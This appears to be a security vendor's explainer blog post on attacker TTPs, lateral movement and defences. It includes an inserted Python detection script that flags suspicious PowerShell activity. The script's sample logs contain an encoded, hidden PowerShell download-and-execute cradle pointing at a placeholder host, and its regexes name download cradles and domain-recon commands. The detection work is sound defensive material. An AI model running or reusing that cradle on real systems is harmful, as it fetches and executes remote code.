Microsoft PowerShell is a ubiquitous piece of software. It’s also, unfortunately, a major attack vector for threat actors. Once a threat actor has gained initial access to a network, they can use PowerShell’s command and scripting capabilities to conduct reconnaissance or inject fileless malware into the network. This activity is so common that it’s continually listed as one of the top tactics, techniques, and procedures (TTPs).
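As an added example (not part of the original post), the defender’s side of the PowerShell problem: a small triage routine that scans constructed script-block log lines (Event ID 4104 style) for the reconnaissance and fileless-execution behaviours described above, decodes -EncodedCommand blobs so hidden payloads are still matched, and tags each hit with the ATT&CK technique ID for PowerShell abuse. The log format, hostnames, user names and regex patterns are assumptions chosen for illustration.

```python
import base64
import re

# ATT&CK technique for PowerShell abuse (Command and Scripting Interpreter: PowerShell).
ATTACK_TECHNIQUE = "T1059.001"
# Behaviours named in the post, expressed as script-block patterns a defender can match on.
PATTERNS = {
    "encoded_command": re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I),
    "download_cradle": re.compile(r"\b(?:Net\.WebClient|Invoke-WebRequest|DownloadString|IEX|Invoke-Expression)\b", re.I),
    "recon": re.compile(r"\b(?:Get-ADUser|Get-ADComputer|net\s+(?:user|group)|whoami|nltest)\b", re.I),
}

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_script_block(text):
    """Return the set of behaviour labels matched by one script block (encoded text is rescanned)."""
    hits = {name for name, rx in PATTERNS.items() if rx.search(text)}
    m = PATTERNS["encoded_command"].search(text)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            hits |= analyze_script_block(decoded)
    return hits

def triage(log_lines):
    """Scan 4104-style lines 'event|host|user|ScriptBlockText' and report the suspicious ones."""
    findings = []
    for line in log_lines:
        _, host, user, script = line.split("|", 3)
        hits = analyze_script_block(script)
        if hits:
            findings.append({"host": host, "user": user, "technique": ATTACK_TECHNIQUE,
                             "behaviours": sorted(hits)})
    return findings

# Constructed sample telemetry, not real logs; the encoded command is built at runtime so the
# blob is genuine base64(UTF-16LE) rather than a hand-typed string.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_LOGS = [
    "4104|WS01|jdoe|Get-ChildItem C:\\Reports | Measure-Object",
    "4104|WS01|jdoe|powershell -nop -w hidden -enc "
    + base64.b64encode(CRADLE.encode("utf-16-le")).decode(),
    "4104|SRV02|svc_backup|net group \"Domain Admins\" /domain; whoami /all",
    "4104|SRV02|svc_backup|Get-Date",
]
```

Running `triage(SAMPLE_LOGS)` flags two of the four lines: the encoded download cradle on WS01 and the domain-group enumeration on SRV02, while the benign file listing and `Get-Date` pass.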
TTPs, broadly speaking, explain how threat actors gain access to and move through a system, as well as how they successfully launch attacks and data breaches. TTPs are studied, analyzed, and adjusted by both the cybersecurity and cybercrime community and thus play a major role in the modern cyber landscape.
Understanding what TTPs are and the value they provide can be a major benefit to your organization’s security journey, in addition to helping your organization prioritize security posture improvements and implement better detection and response methods.
What Are Tactics, Techniques, and Procedures?
Tactics, Techniques, and Procedures (TTPs) refer to the patterns, activities, and methods of a threat actor or threat actor group. Simply, TTPs are how a cybercriminal conducts an attack.
There are three main parts to TTPs:
1. Tactics. Tactics are the high-level behavior and strategy of a threat actor or threat actor group. For example, a threat actor deciding to extort an organization with ransomware would be a tactic.
Common tactics include:
- Delivery or exploitation
2. Techniques. Tactics are realized through techniques, which are the intermediate steps in a threat actor’s plan. For example, a threat actor sending a phishing email to try to gain credentials to a system or application would be a technique.
Common techniques include:
- Data transfers or modifications
3. Procedures. Procedures are the specific steps a threat actor or threat actor group takes, utilizing a specific technique, to execute an attack tactic. Procedures are the most detailed and specific component of the three.
Because procedures are specific to a given incident, there is no set of common procedures. However, there are broader patterns of attacks we can identify, such as launching a social engineering campaign to gain credentials and then encrypting part of the network in a ransomware attack, or using stolen credentials to log in to a user’s email account and launch a business email compromise (BEC) attack.
As technology changes, so do TTPs; they are always evolving. A TTP that was common among threat actors years ago may no longer be in use, while new TTPs are developing all the time. Take for example SEO poisoning, where a threat actor uses search engine optimization (SEO) best practices to get a fake site, often serving malware, to appear at the top of search results so that it looks legitimate. That TTP has only become possible, and more widespread, because of the evolution of search engines and SEO.
Examples of TTPs
While TTPs may evolve and change over time, they are not infinite. Threat actors love to reuse TTPs that have worked in the past, preferring efficiency and success rates over innovation.
Common TTPs seen consistently can include:
- Supply chain compromise
- Remote code execution
- Account creation or manipulation
- Privilege escalation
- File encryption
- Malware execution
- Internal spear phishing (and other lateral movement techniques)
- Data exfiltration
- Network denial of service
- Firmware corruption
This is just a small sample of the TTPs used by threat actors, which can vary depending on type of attack, behavior changes during the attack, and the industry or organization targeted. MITRE ATT&CK is the leading database of all current TTPs and is often used to develop threat models and understand past and future TTPs.
Lateral Movement: A Critical TTP
Lateral movement is a tactic threat actors use to move around a target’s environment to achieve their cyber attack goal. After initial access is achieved, a threat actor often needs to move into different parts of the system or go deeper into the system to exfiltrate data or execute another kind of attack.
Common lateral movement techniques include:
- Exploitation of remote services
- Internal spear phishing
- Lateral tool transfer
- Remote hijacking
- Remote desktop protocol
- Cloud service login
- Application access token
TTPs’ Role in Cyber Threat Intelligence
TTPs play a critical role in the development of threat intelligence that informs cybersecurity technology, people, and processes.
Cyber threat intelligence comprises three categories, one of which is tactical — primarily consisting of TTPs.
Those TTPs play a major role in proactive security for organizations, helping them understand the threat landscape and how it relates back to their organization. If threat actors are exploiting a certain vulnerability to launch ransomware attacks or exfiltrate data, as was the case with the MOVEit Transfer vulnerability, understanding the specifics can be the difference between swift patching, detection, and response on one side and a severe incident on the other.
General trends, predictions, and decisions are also predicated on current TTPs. From rapid triage and investigation to better threat detection, to industry- or organization-specific threat monitoring, understanding TTPs can have various positive outcomes. TTPs also help establish an attack framework and can provide attribution, which allows incident responders to respond in a way that can de-escalate or stop an attack. For example, an unknown piece of malware can be identified based on how it’s moving through a system, or a particular execution pattern can be attributed to a specific ransomware group based on this shared TTP knowledge.
See how Arctic Wolf’s detection and response uses multiple data points to identify and mitigate incidents.
How To Defend Against Common TTPs
Securing your environment against common TTPs is not a one-and-done task. Just as cybersecurity solutions are evolving, so are cybercriminals — shifting their behaviors, finding new vulnerabilities, and adding sophisticated steps to their attack patterns.
The best approach is holistic and has both proactive and reactive components such as vulnerability management and 24×7 monitoring, detection, and response.
A few ways for any organization to harden its attack surface and improve its security posture include:
- Understand your organization’s unique attack surface, including users, critical assets, applications, network structure, and endpoints.
- Gain or increase visibility into your environment, which will allow your organization to better detect and respond to threats before they become incidents. In addition, visibility allows for prioritization when it comes to proactive initiatives.
- Practice robust identity and access management, as threat actors are increasingly utilizing credentials and privileged access in attacks. This should include employing a zero-trust strategy.
- Prioritize your cloud environment, ensuring there are no security gaps or misconfigurations.
- Establish a culture of security. No IT department can do it alone, and while individual users can create risk in the attack surface, they can also help harden it, from identifying phishing emails to regularly updating their devices.
- Transfer risk by purchasing cyber insurance or an incident response retainer.
See Arctic Wolf’s cybercrime predictions for this year based on the TTPs of the past.
Explore how Arctic Wolf’s Security Operations Platform collects, enriches, and analyzes security data at scale to better detect and respond to organization-specific threats.